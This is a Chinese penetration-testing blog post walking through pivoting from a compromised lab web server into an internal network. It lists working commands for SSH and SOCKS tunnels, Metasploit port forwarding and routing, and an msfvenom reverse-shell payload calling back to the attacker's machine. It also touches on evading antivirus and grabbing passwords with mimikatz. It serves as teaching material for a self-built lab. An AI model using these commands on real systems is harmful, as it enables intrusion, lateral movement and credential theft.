渗透测试-地基篇-内网穿透篇(十七)

最新推荐文章于 2024-08-05 08:54:44 发布
最新推荐文章于 2024-08-05 08:54:44 发布
阅读量3.2k 收藏 14
点赞数 6
分类专栏: 红队-地基-必会 文章标签: 安全 linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/110499991
版权

**

渗透测试-地基篇-内网穿透篇(十七)

**

作者:大余
时间:2020-12-04

简介:

渗透测试-地基篇:
该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意:

对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

文章目录

一、前言

本次介绍的是在拿站获得webshell提权后,如何进一步建立隧道的文章,这是地基篇章,都是基础必会技术,不会很深入,废话不多说,化繁为简,渗透!

注意:
最重要的是思路,思路可以套用在各种各样的方法内,工具千万种,用法都是次要的!!

二、环境介绍

攻击设备:kali-2020.4
外网IP地址:192.168.175.145

Web服务器:Ubuntu.20.04.1
外网IP地址:192.168.175.153
内网IP地址:10.10.1.7

数据库和内网服务器:windows2003
内网IP地址:10.10.1.6

外网网关:192.168.175.2
在这里插入图片描述

目前数据库和内网服务器在内网环境,kali只能访问web服务器并拿到了webshell提权成功,由于web服务器功能权限局限性大,本篇文章讲解利用SSH隧道建立kali和windwos2003之间的连接,并最大限制的进一步渗透内网环境。

三、SSH隧道

目前已经获得了web服务器乌班图的webshell权限。这里如何拿webshell,前期文章都有讲!

1、ssh正向连接

在这里插入图片描述

命令:

ssh -CNfL 0.0.0.0:6666:10.10.1.6:80 dayu@127.0.0.1
#回环地址+端口+正向隧道地址+地址端口  +本地ssh登录地址

意思是:路由回环地址0+6666端口建立内网服务器80端口隧道,建立的中间条件是ssh访问协议。
在这里插入图片描述
可看到通过正向连接访问到了内网服务器dayu-test.php页面,回显数据表明连接成功。

2、ssh反向连接

在这里插入图片描述
命令:

ssh -qTfnN -R 8888:127.0.0.1:22  kali@192.168.175.145

内网服务器和kali是无法通讯的,利用ssh反向代理将本地22端口数据量映射到8888端口上。

反向代理这里不建议用,但是也和大家讲解下,主要作用在于通过公网的主机打通穿透两个不相通的局域网。这里能跳过防火墙限制,但是会话只要一中断就再也连接不上了。

3、ssh开启sockes代理

ssh -D 端口 user@theserver

这种方法是SSH隧道中最暴力的方法,直接通过配置浏览器、proxychan、Proxifier等等,配置它们的sockes5后就可以直接使用代理流量上网了,对于VPS较实用。

三、端口转发

这里讲解的是利用metaspolit进行端口转发和映射。

在这里插入图片描述

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.175.145 LPORT=1037 -f elf > dayu.elf

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.175.145 lport=1037 --f elf -o shell

利用msfvenom生成shell,然后base64等方法混淆加密免杀上传,反弹回kali-MSF。
免杀跳过,后期会讲解~这是站在前言基础上,拿到了乌班图的shell。

1、端口映射

在这里插入图片描述

portfwd list		#查看列表
portfwd flush		#清空列表
portfwd add -L 192.168.175.145 -l 8089 -p 80 -r 10.10.1.6

可看到成功将内网服务器的10.10.1.6的80端口映射到了本地kali的8089端口上。
在这里插入图片描述
通过本地访问8089端口可以直接访问到内网服务器80页面,这是一种思路,在内网服务器存在不同服务可以提权的情况下,都可以转发~

这里用得比较多的还是利用msf的EXP拿shell后,继续后渗透~

2、端口转发

端口转发到本地是在特殊情况下,或者在shell上无法更好的执行,或者需要远程到对方桌面上去进行进一步的操作等等,这里介绍了MSF端口转发到3389上,进行远程登录。
在这里插入图片描述
成功将端口3389转发到本地8090端口上。
在这里插入图片描述

portfwd add -l 5555 -p 3389 -r 192.168.175.153
rdesktop 127.1.1.0:8090

可看到在kali上运行rdesktop后成功通过8090端口登录到对方的3389远程桌面上,这里密码可以上传mimikatz获得密码…

四、socket隧道

Socket隧道比SSH隧道应用更广范,以及使用起来简单,该方法可以直接绕过防火墙设备进行进一步内网穿透。

1、下载安装ssocks

首先需要下载:(kali2020.4和web服务器都需要安装)
在这里插入图片描述

http://sourceforge.net/projects/ssocks/

下载完成后进行解压并执行:

tar zxvf ssocks-0.0.14.tar.gz
./configure && make		#进行编辑并生成文件

然后会出现SRC目录,所有的隧道文件都在该目录下:
在这里插入图片描述
这里操作主要用到rcsocks、rssocks。

2、执行反向代理

在这里插入图片描述

./rcsocks -l 3333 -p 2222 -vv

本地通过rcsocks将端口3333和2222端口建立连接通道,等待远程Socks5服务器访问本地2222端口即可。
在这里插入图片描述

./rssocks -s 192.168.175.145:2222 -vv

通过rssocks访问攻击者kali建立的2222端口,这样socket隧道就建立成功了,该隧道可以通过代理形式互相访问。

下面还需要一些链接代理的工具,firefox浏览器、proxychains、proxifire都可以,这里演示proxychains。

apt install proxychains    #安装

接下来配置下vi /etc/proxychains4.conf
在这里插入图片描述
加个sockes即可:socks5 127.0.0.1 2222
在这里插入图片描述
这里功能很多,这是一个思路,这里遇到了个问题:gcc编译的socks文件在gdb研究调用的时候,出现了错误,段错误 (核心已转储)将栈堆大小修改还是未解决,目前是乌班图的系统,先撂这里吧这问题,以后遇到了处理。

该方法可以穿越防火墙、各种限制进行流量输出,非常实用。

五、跨路由穿透

该方法还是依照最前面的拓扑图进行演示,该思路讲解的是在网关是192.168.175.2不通内网10.10.1.0段的情况下,攻击者kali如何跨路由进行连接到内网服务器,并对内网服务器进行渗透行为操作。

1、查看网卡信息

在这里插入图片描述
命令:

ifconfig

可看到获得shell的是双网卡的web服务器。

2、查看路由状态

在这里插入图片描述
命令:

getuid			#查看到当前用户是dayu@dayu
run get_local_subnets		#查看当前路由信息

可看到当前路由信息:
Local subnet: 10.10.1.0/255.255.255.0
Local subnet: 192.168.175.0/255.255.255.0

在这里插入图片描述
命令:

run autoroute –p 		#查看是否添加过路由信息

可看到未添加过任何路由信息,这边进行添加!

3、添加本地路由信息

前面通过查看到路由信息10.10.1.0/24段,这里添加即可:
在这里插入图片描述
命令:

run autoroute  -s 10.10.1.0/24		#添加路由

可看到成功在本地添加了路由10.10.1.0/24!!

4、msf-socks4代理

在这里插入图片描述
命令:

background		#退出session会话界面,session依旧维持状态,session +数号即可返回
use auxiliary/server/socks4a	#选择sockes4代理模块

SRVHOST  0.0.0.0  	#本地默认
SRVPORT  1080       #端口可以自行更改,代理端口

在这里插入图片描述
run成功执行:
该思路是复用了session 1中的shell,在本地添加了新路由后,对本地的所有路由进行了sockes4流量代理。

5、修改本地代理走向

在这里插入图片描述
命令:

vi /etc/proxychains4.conf	#添加socks4代理流量

6、成功穿透

在这里插入图片描述
在这里插入图片描述

命令:

proxychains firefox		#走代理流量打开软件

可看到通过proxychains代理进行sockes4流量登录了firefox浏览器后,直接在浏览器中走sockes4流量进行路由转发后登录到了内网服务器上,成功实现了内网穿透。

这里还可以proxychains+nmap、hydra、sqlmap、等等等支持挺多的软件

当然这里更推荐走Proxifier全局代理飞起,这里不往下教了,学习的是思路!!

六、总结另外思路

这里我没有写最喜欢的nc思路,因为估计大家都会用也非常简单!下面我在提一些我还会的一些端口转发、代理等等内网穿透的工具吧…

Proxifier、reGeorg、xsocket、nc、Lcx、Frp、IPsec、ngrok,能脑子记起来的就这些,其他都不记得了~~

工具太多了,各有各的好用之处,当人会一两款就够用了,主要的是思路,渗透过程中会遇到各种各样的环境,好好加油吧~~

以上的方法都是最简单的,也是基础,这里的思路学会了穿透防火墙,穿透各种设备都不成问题,但是别想着不被发现…这些都会在流量中体现到行为特征,只要想抓是跑不掉的…

今天基础牢固就到这里,虽然基础,但是必须牢记于心。

要是你觉得这篇博客写的还不错,欢迎分享给身边的人,欢迎加入免费群共同学习成长。

在这里插入图片描述

如失效加个人以下图,个人微信拉入群。

在这里插入图片描述

大余xiyou
关注
专栏目录
渗透测试地基服务:服务攻防之中间件JBoss
HBohan的博客
09-22 384
简介 渗透测试-地基章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。 名言: 你对这行的兴趣,决定你在这行的成就! 一、前言 中间件是介于应用系统和系统软件之间的一类软件,它使
渗透测试之内网渗透(二):内网穿透
m0_74131821的博客
04-24 2482
本文将从内网穿透的原理开始探讨,根据不同的内网出网入网情况,灵活设计对应的内网穿透方案
内网穿透测试
weixin_34210740的博客
04-16 1084
个人用ngrok小工具做一个内网穿透测试,原理就是反向代理 http://10.7.120.131:9180/eeka-product-wms/prowmsapi/oms/pushOO 转载于:https://blog.51cto.com/9381188/2104019
一次完整的渗透测试(非常详细)零基础入门到精通,收藏这一就够了
最新发布
Python_paipai的博客
08-05 636
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。因此,我们着重围绕这些方面进行渗透。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
用cpolar内网穿透进行网页测试
02-09 1084
cpolar作为一款高效安全内网穿透软件,能够在本地电脑上生成授权者才能使用的“隧道”,而网页发布者就可以通过这个隧道,允许用户(包括对网页预览的甲方)对本地网页进行访问测试,及时修改和处理网页存在的问题,避免了网页上传后再测试,修正错误所耗费的时间和精力。
ipsec NAT-T与穿透
weixin_33842304的博客
12-10 267
拓扑:   一 NAT-T R1配置:   R2配置: 默认开启NAT-T R3配置: 分析: 端口由UDP500变为UDP4500;隧道封装为:tunnel UDP-encaps。 二 穿透 R1配置: R2配置: R3配置: 分析: 端口是UDP500,没有改动 隧道封装:tunnel 可以看出穿透减小了...
浅说关于做内网穿透和网络端口测试
anzhengxv的博客
04-17 1922
1.内网穿透 内网穿透原理是映射端口, 能让外网的电脑找到处于内网的电脑; 简单说就是局域网的服务外网访问不到,通过内网穿透技术来实现外网到内网的端口映射, 进行实现外网访问内网服务.也就是说你在本机做的程序或者软件,可以不对外发布上去就直接让外网的人申请和测试 市场上流行的支持内网穿透的工具包括 Ngrok, Natapp, 小米球, Sunny-Ngrok, echosite, autossh, Lanproxy, Spike, Frp 等; 推荐使用Ngrok, 大多工具其实是基于Ngro..
渗透测试之内网渗透学习
2201_75571291的博客
06-22 1828
渗透测试之内网渗透学习
基于GPU的车辆-轨道-地基土耦合系统3D随机振动并行计算方法.pdf
09-25
基于GPU的车辆-轨道-地基土耦合系统3D随机振动并行计算方法 摘要:本文提出了一种基于GPU的车辆-轨道-地基土耦合系统3D随机振动并行计算方法,以解决轨道不平顺随机特征导致的车辆-轨道-地基土耦合系统随机分析计算...
云计算-地基、基础共同作用统一计算分析新方法的研究.pdf
06-29
【云计算-地基、基础共同作用统一计算分析新方法的研究】 云计算在现代信息技术领域中扮演着至关重要的角色,它提供了一种高效、灵活且可扩展的计算资源分配方式。然而,当涉及到基础设施层面,尤其是地基和基础在...
内网渗透讲义(1).pdf
06-30
渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透
行业文档-设计装置-地基中存在粉质沙层的钻孔桩成型方法.zip
08-26
粉质沙层通常具有高渗透性、松散和易液化的特性,这给钻孔桩的施工带来了挑战。本知识点将详细探讨在地基中存在粉质沙层时,钻孔桩的成型方法及其相关技术要点。 首先,了解粉质沙层的特性是关键。粉质沙粒径较小,...
防火墙—IPSec VPN(NAT 穿透-双侧 NAT)
weixin_44080599的博客
06-05 4076
奇安信防火墙 IPSEC VPN 详解
IPsec v p n详解--nat穿越内网
weixin_33795743的博客
11-20 650
四. NAT穿越内网路由v p n设置如图1所示,Router A为某机构总部网关,Router D和Router E是两个分支网关,Router B和Router C为分支提供NAT转换。要求:为了接受协商发起端的访问控制列表设置,Router A采用安全模板方式分别与Router D和Router E建立IPsec ***,为总部和分支流量进行加密传输。图1 IPSec ...
frp实现内网穿透
eRunn
02-29 286
前言 最近学习微信公众号,微信公众号测试时需要内网穿透,开始时使用ngrock(第一天用的挺稳),第二天连接ngrock时发现总是不能连接,于是去找了其他内网穿透工具,但发现其他内网穿透工具也一样(要么是收费,要么不稳定),于是想自己代建一个内网穿透工具。 实现 准备 公网服务器1台(linux) 已经备案的域名一个(已经解析到你要配置的内网穿透服务器) 安装frp 1.linux安装 下载...
内网渗透测试:隐藏通讯隧道技术(上)
whatday的专栏
07-30 2107
什么是隧道? 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。 常用的隧道技术有以下三种: 网络层:IPv6 隧道、ICMP 隧道 传输层:TCP 隧道、UDP 隧道、常规端口转发
内网渗透测试:隐藏通讯隧道技术(下)
weixin_43733912的博客
11-03 624
系列文章: 内网渗透测试:隐藏通讯隧道技术(上) 什么是隧道? 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。 上一节中,我们讲解了网络层的隧道技术(IPv6 隧道、ICMP 隧道)
渗透测试-地基-隧道之Frp内网穿透(二十三)
qq_34801745的博客
12-14 3222
** 渗透测试-地基-隧道之Tunna内网穿透(二十三) ** 作者:大余 时间:2020-12-13 简介: 渗透测试-地基: 该章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定你在这
高层建筑地震反应分析:结构-地基动力相互作用
"高层建筑结构-地基动力互相作用地震反应分析" 本文主要探讨了高层建筑在地震中的动力响应,特别是结构与地基体系之间的动力相互作用。针对这一问题,作者改进了采用桩筏基础的高层建筑结构-地基体系的动力分析模型...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值